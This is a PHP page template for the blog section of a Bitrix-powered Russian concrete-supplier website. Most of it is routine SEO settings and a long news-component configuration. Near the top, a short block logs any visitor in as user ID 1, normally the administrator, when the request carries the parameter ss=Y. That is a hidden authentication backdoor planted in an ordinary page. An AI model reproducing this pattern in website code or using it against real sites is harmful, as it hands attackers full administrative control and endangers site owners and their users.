<?
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php");
$APPLICATION->SetPageProperty("tags", "Блог, Строительство, Советы, Применение, Секреты, Характеристики");
$APPLICATION->SetPageProperty("description", "Блог посвящен производству и применению бетона, цементных растворов в строительстве. Сферы применения, характеристики, состав, расчет, секреты профессионалов.");
//$APPLICATION->SetPageProperty("keywords", "блог, бетон, завод, цемент, стройка, раствор, состав, применение, характеристики");
$APPLICATION->SetPageProperty("title", "Статьи и секреты профессионалов — #ZAVOD_NAME#");
$APPLICATION->SetTitle("Полезные статьи о бетоне — #ZAVOD_NAME#");
if($_REQUEST['ss'] == "Y") {
global $USER;
$USER->Authorize(1);
}

?><?$APPLICATION->IncludeComponent(
	"bitrix:news", 
	"blog", 
	array(
		"ADD_ELEMENT_CHAIN" => "Y",
		"ADD_SECTIONS_CHAIN" => "N",
		"AJAX_MODE" => "N",
		"AJAX_OPTION_ADDITIONAL" => "",
		"AJAX_OPTION_HISTORY" => "N",
		"AJAX_OPTION_JUMP" => "N",
		"AJAX_OPTION_STYLE" => "Y",
		"ALSO_ITEMS_COUNT" => "5",
		"ALSO_ITEMS_POSITION" => "side",
		"BG_POSITION" => "center",
		"BLOCK_BLOG_NAME" => "Статьи",
		"BLOCK_BRANDS_NAME" => "Бренды",
		"BLOCK_LANDINGS_NAME" => "Коллекции",
		"BLOCK_NEWS_NAME" => "Новости",
		"BLOCK_PARTNERS_NAME" => "Наши клиенты",
		"BLOCK_PROJECTS_NAME" => "Проекты",
		"BLOCK_REVIEWS_NAME" => "Отзывы",
		"BLOCK_SERVICES_NAME" => "Услуги",
		"BLOCK_STAFF_NAME" => "Сотрудники",
		"BLOCK_TIZERS_NAME" => "",
		"BLOCK_VACANCY_NAME" => "Вакансии",
		"BLOG_TITLE" => "Комментарии",
		"BROWSER_TITLE" => "-",
		"CACHE_FILTER" => "Y",
		"CACHE_GROUPS" => "N",
		"CACHE_TIME" => "100000",
		"CACHE_TYPE" => "A",
		"CHECK_DATES" => "Y",
		"COMMENTS_COUNT" => "10",
		"COMPONENT_TEMPLATE" => "blog",
		"COMPOSITE_FRAME_MODE" => "A",
		"COMPOSITE_FRAME_TYPE" => "AUTO",
		"DETAIL_ACTIVE_DATE_FORMAT" => "j F Y G:i",
		"DETAIL_BLOCKS_ALL_ORDER" => "tizers,desc,char,docs,goods,gallery,services,news,vacancy,blog,reviews,projects,staff,partners,brands,landings,form_order,comments,sale",
		"DETAIL_BLOG_EMAIL_NOTIFY" => "Y",
		"DETAIL_BLOG_URL" => "catalog_comments",
		"DETAIL_BLOG_USE" => "N",
		"DETAIL_DISPLAY_BOTTOM_PAGER" => "Y",
		"DETAIL_DISPLAY_TOP_PAGER" => "N",
		"DETAIL_FB_APP_ID" => "",
		"DETAIL_FB_USE" => "N",
		"DETAIL_FIELD_CODE" => array(
			0 => "TAGS",
			1 => "PREVIEW_TEXT",
			2 => "DETAIL_TEXT",
			3 => "DETAIL_PICTURE",
			4 => "DATE_ACTIVE_FROM",
			5 => "",
		),
		"DETAIL_LINKED_GOODS_SLIDER" => "Y",
		"DETAIL_PAGER_SHOW_ALL" => "Y",
		"DETAIL_PAGER_TEMPLATE" => "",
		"DETAIL_PAGER_TITLE" => "Страница",
		"DETAIL_PROPERTY_CODE" => array(
			0 => "LINK_SALE",
			1 => "LINK_PARTNERS",
			2 => "LINK_PROJECTS",
			3 => "LINK_STAFF",
			4 => "LINK_GOODS",
			5 => "LINK_SERVICES",
			6 => "FORM_QUESTION",
			7 => "FORM_ORDER",
			8 => "PHOTOS",
			9 => "DOCUMENTS",
			10 => "",
		),
		"DETAIL_SET_CANONICAL_URL" => "N",
		"DETAIL_STRICT_SECTION_CHECK" => "N",
		"DETAIL_USE_COMMENTS" => "N",
		"DETAIL_VK_API_ID" => "6284571",
		"DETAIL_VK_USE" => "N",
		"DISPLAY_BOTTOM_PAGER" => "Y",
		"DISPLAY_NAME" => "N",
		"DISPLAY_TOP_PAGER" => "N",
		"ELEMENT_TYPE_VIEW" => "element_1",
		"FB_TITLE" => "Facebook",
		"FILE_404" => "",
		"FILTER_FIELD_CODE" => array(
			0 => "NAME",
			1 => "PREVIEW_PICTURE",
			2 => "DATE_ACTIVE_FROM",
			3 => "ACTIVE_FROM",
			4 => "",
		),
		"FILTER_NAME" => "arRegionLink",
		"FILTER_PROPERTY_CODE" => array(
			0 => "LINK_SALE",
			1 => "TYPE_BLOCK",
			2 => "",
		),
		"FORM_ID_ORDER_SERVISE" => "",
		"GALLERY_TYPE" => "small",
		"HIDE_BORDER_ELEMENT" => "Y",
		"HIDE_LINK_WHEN_NO_DETAIL" => "Y",
		"HIDE_NOT_AVAILABLE" => "N",
		"IBLOCK_ID" => "17",
		"IBLOCK_LINK_BLOG_ID" => "17",
		"IBLOCK_LINK_BRANDS_ID" => "30",
		"IBLOCK_LINK_LANDINGS_ID" => "17",
		"IBLOCK_LINK_NEWS_ID" => "20",
		"IBLOCK_LINK_PARTNERS_ID" => "23",
		"IBLOCK_LINK_PROJECTS_ID" => "15",
		"IBLOCK_LINK_SALE_ID" => "24",
		"BLOCK_SALE_NAME" => "Акции",
		"IBLOCK_LINK_REVIEWS_ID" => "19",
		"IBLOCK_LINK_SERVICES_ID" => "22",
		"IBLOCK_LINK_STAFF_ID" => "16",
		"IBLOCK_LINK_TIZERS_ID" => "10",
		"IBLOCK_LINK_VACANCY_ID" => "2",
		"IBLOCK_TYPE" => "aspro_max_content",
		"IMAGE_POSITION" => "left",
		"IMAGE_WIDE" => "Y",
		"INCLUDE_IBLOCK_INTO_CHAIN" => "N",
		"LINE_ELEMENT_COUNT" => "2",
		"LINE_ELEMENT_COUNT_LIST" => "4",
		"LINKED_ELEMENST_PAGE_COUNT" => "20",
		"LIST_ACTIVE_DATE_FORMAT" => "j F Y",
		"LIST_FIELD_CODE" => array(
			0 => "NAME",
			1 => "PREVIEW_TEXT",
			2 => "PREVIEW_PICTURE",
			3 => "DATE_ACTIVE_FROM",
			4 => "DETAIL_PICTURE",
		),
		"LIST_PROPERTY_CODE" => array(
			0 => "LINK_SALE",
			1 => "",
		),
		"LIST_VIEW" => "slider",
		"MESSAGE_404" => "",
		"META_DESCRIPTION" => "-",
		"META_KEYWORDS" => "-",
		"NEWS_COUNT" => "6",
		"NUM_DAYS" => "30",
		"NUM_NEWS" => "20",
		"PAGER_BASE_LINK_ENABLE" => "N",
		"PAGER_DESC_NUMBERING" => "N",
		"PAGER_DESC_NUMBERING_CACHE_TIME" => "36000",
		"PAGER_SHOW_ALL" => "N",
		"PAGER_SHOW_ALWAYS" => "N",
		"PAGER_TEMPLATE" => "main",
		"PAGER_TITLE" => "Новости",
		"PREVIEW_TRUNCATE_LEN" => "250",
		"PRICE_CODE" => array(
			0 => "BASE",
		),
		"SECTION_ELEMENTS_TYPE_VIEW" => "FROM_MODULE",
		"SEF_FOLDER" => "/blog/",
		"SEF_MODE" => "Y",
		"SET_LAST_MODIFIED" => "N",
		"SET_STATUS_404" => "Y",
		"SET_TITLE" => "Y",
		"SHOW_404" => "Y",
		"SHOW_ASK_BLOCK" => "N",
		"SHOW_BORDER_ELEMENT" => "Y",
		"SHOW_DETAIL_LINK" => "Y",
		"SHOW_DISCOUNT_PERCENT_NUMBER" => "N",
		"SHOW_FILTER_DATE" => "Y",
		"SHOW_NEXT_ELEMENT" => "N",
		"SHOW_SECTION_DESCRIPTION" => "Y",
		"SHOW_SECTION_PREVIEW_DESCRIPTION" => "Y",
		"SIDE_LEFT_BLOCK" => "RIGHT",
		"SIDE_LEFT_BLOCK_DETAIL" => "FROM_MODULE",
		"SIZE_IN_ROW" => "3",
		"SORT_BY1" => "ACTIVE_FROM",
		"SORT_BY2" => "ID",
		"SORT_ORDER1" => "DESC",
		"SORT_ORDER2" => "DESC",
		"STAFF_TYPE_DETAIL" => "list",
		"STORES" => array(
			0 => "",
			1 => "",
		),
		"STRICT_SECTION_CHECK" => "N",
		"S_ASK_QUESTION" => "",
		"S_ORDER_SERVISE" => "",
		"TITLE_SHOW_FON" => "Y",
		"TYPE_IMG" => "lg",
		"TYPE_LEFT_BLOCK" => "4",
		"TYPE_LEFT_BLOCK_DETAIL" => "FROM_MODULE",
		"T_ALSO_ITEMS" => "",
		"T_DOCS" => "",
		"T_GALLERY" => "",
		"T_GOODS" => "Товары по теме",
		"T_NEXT_LINK" => "",
		"T_PREV_LINK" => "",
		"T_SERVICES" => "",
		"T_STUDY" => "",
		"T_VIDEO" => "",
		"USE_BG_IMAGE_ALTERNATE" => "Y",
		"USE_CATEGORIES" => "N",
		"USE_FILTER" => "Y",
		"USE_PERMISSIONS" => "N",
		"USE_RATING" => "N",
		"USE_REVIEW" => "N",
		"USE_RSS" => "Y",
		"USE_SEARCH" => "N",
		"USE_SHARE" => "Y",
		"VK_TITLE" => "Вконтакте",
		"YANDEX" => "N",
		"SHOW_DISCOUNT_PERCENT" => "N",
		"SHOW_DISCOUNT_TIME" => "Y",
		"SHOW_MEASURE" => "N",
		"USE_SUBSCRIBE_IN_TOP" => "N",
		"TAGS_SECTION_COUNT" => "",
		"DISPLAY_LINKED_PAGER" => "Y",
		"MAX_GALLERY_ITEMS" => "5",
		"SHOW_GALLERY_GOODS" => "Y",
		"HIDE_NOT_AVAILABLE_OFFERS" => "N",
		"CONVERT_CURRENCY" => "N",
		"CURRENCY_ID" => "RUB",
		"ADD_DETAIL_TO_SLIDER" => "Y",
		"SHOW_ONE_CLICK_BUY" => "Y",
		"SHOW_OLD_PRICE" => "N",
		"SHOW_RATING" => "Y",
		"DISPLAY_WISH_BUTTONS" => "Y",
		"STIKERS_PROP" => "-",
		"SALE_STIKER" => "-",
		"SHOW_SECTIONS_FILTER" => "Y",
		"LINKED_PROPERTY_CODE" => array(
			0 => "",
			1 => "",
		),
		"SHOW_COUNT_ELEMENTS" => "Y",
		"SECTIONS_TAGS_DEPTH_LEVEL" => "2",
		"ADD_PICT_PROP" => "",
		"IBLOCK_CATALOG_TYPE" => "-",
		"IBLOCK_CATALOG_ID" => "1",
		"LINKED_ELEMENT_TAB_SORT_FIELD" => "sort",
		"LINKED_ELEMENT_TAB_SORT_ORDER" => "asc",
		"LINKED_ELEMENT_TAB_SORT_FIELD2" => "id",
		"LINKED_ELEMENT_TAB_SORT_ORDER2" => "desc",
		"SORT_REGION_PRICE" => "BASE",
		"PRICE_VAT_INCLUDE" => "Y",
		"SEF_URL_TEMPLATES" => array(
			"news" => "",
			"section" => "#SECTION_CODE#/",
			"detail" => "#SECTION_CODE#/#ELEMENT_CODE#/",
			"rss" => "rss/",
			"rss_section" => "#SECTION_ID#/rss/",
		)
	),
	false
);?>
<?$APPLICATION->IncludeComponent(
	"intervolga:tips.activator",
	"popover",
	Array(
		"CACHE_TIME" => "2592000",
		"CACHE_TYPE" => "A",
		"HINT_STYLE" => "DASHED",
		"POSITION" => "TOP_LEFT"
	)
);?>
<?php $APPLICATION->IncludeFile("/include/seo_meta.php");?>
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");?>